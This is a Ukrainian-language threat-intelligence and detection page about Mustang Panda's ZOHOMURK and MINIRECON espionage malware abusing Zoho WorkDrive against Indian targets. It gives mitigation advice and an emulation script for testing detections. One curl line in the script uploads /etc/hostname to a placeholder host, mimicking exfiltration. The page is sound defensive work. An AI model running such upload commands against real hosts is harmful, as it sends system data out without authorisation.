SOC Prime Bias: Високий

06 Jul 2026 21:57 UTC

Mustang Panda використовує ZOHOMURK та MINIRECON проти уряду та енергетичного сектору Індії

Author Photo
SOC Prime Team linkedin icon Стежити
Mustang Panda використовує ZOHOMURK та MINIRECON проти уряду та енергетичного сектору Індії
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Mustang Panda проводить шпигунські операції, націлені на уряд Індії та сектори гідроенергетики. Група використовує оновлений набір зловмисних програм, що включає SHARDLOADER, MINIRECON і ZOHOMURK. Однією з її помітних технік є зловживання Zoho WorkDrive для командування і управління та ексфільтрації даних.

Розслідування

Acronis TRU ідентифікувала дві паралельні кампанії, що використовували фішингові приманки, присвячені співпраці Індія-Тайвань. Дослідники виявили DLL-інжекцію через легітимні двійкові файли Solid PDF Creator і проаналізували нові імплантати ZOHOMURK і MINIRECON. Розслідування проводилося також у координації з CERT-In для підтримки захисних дій.

Пом’якшення

Організації повинні контролювати незвичайну активність з використанням хмарних платформ, особливо несанкціоноване використання Zoho WorkDrive. Рішення EDR і XDR повинні бути налаштовані для виявлення DLL-інжекції та підозрілої стійкості на основі реєстру. Необхідна видимість ненавігаційних процесів, які здійснюють HTTPS або WebSocket-з’єднання з хмарними сервісами.

Відповідь

Якщо виявлено цю активність, уражені системи слід негайно ізолювати, щоб зупинити подальшу ексфільтрацію через хмарні API. Слідчі повинні виконати криміналістичний аналіз стежок інсценування, таких як C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCache. Ключі запуску реєстру та заплановані завдання також повинні бути переглянуті на предмет несанкціонованої стійкості.

Потік атаки

Виконання імітації

Передумова: Тест на телеметрію та перевірка основних заготовок має бути пройдена.

Обґрунтування: Цей розділ детально описує точне виконання техніки супротивника (TTP), призначеної для запуску правила виявлення. Команди та оповідання ПОВИННІ прямо відображати виявлені TTP та націлюватися на створення точної телеметрії, очікуваної логікою виявлення. Абстрактні або нерелевантні приклади призводять до неправильного діагностування.

  • Розповідь про атаку та команди: Супротивник успішно встановив плацдарм і намагається ініціювати комунікації командування і управління (C2). Щоб замаскуватися під легітимний бізнес-трафік, імплантат ZOHOMURK намагається спілкуватися зі своїм контролером, імітуючи виклики API Zoho WorkDrive. Зловмисник використовує певний, жорстко закодований рядок User-Agent (Zoho Client/1.0) для проходження через певні мережеві фільтри, сподіваючись змішатися з легітимним трафіком хмарної продуктивності. Ця дія створить запис у проксі-журналі, що містить цільовий User-Agent, тим самим запускатиме правило виявлення.

  • Скрипт для регресійного тестування:

    #!/bin/bash
    # Імітація ZOHOMURK C2 через підробку User-Agent
    # Ціль 1: Імітація Zoho Client
    echo "[+] Імітація ZOHOMURK: Zoho Client/1.0"
    curl -A "Zoho Client/1.0" http://example.com/api/v1/sync
    
    # Ціль 2: Імітація IPFetcher
    echo "[+] Імітація ZOHOMURK: IPFetcher/1.0"
    curl -A "IPFetcher/1.0" http://example.com/checkip
    
    # Ціль 3: Імітація Multipart POST User-Agent
    echo "[+] Імітація ZOHOMURK: Multipart POST"
    curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload
  • Команди очищення:

    # Ця мережево-орієнтована імітація не створює стійких артефактів на системі.
    # Просто переконайтеся, що жодні фонові процеси curl не працюють.
    pkill curl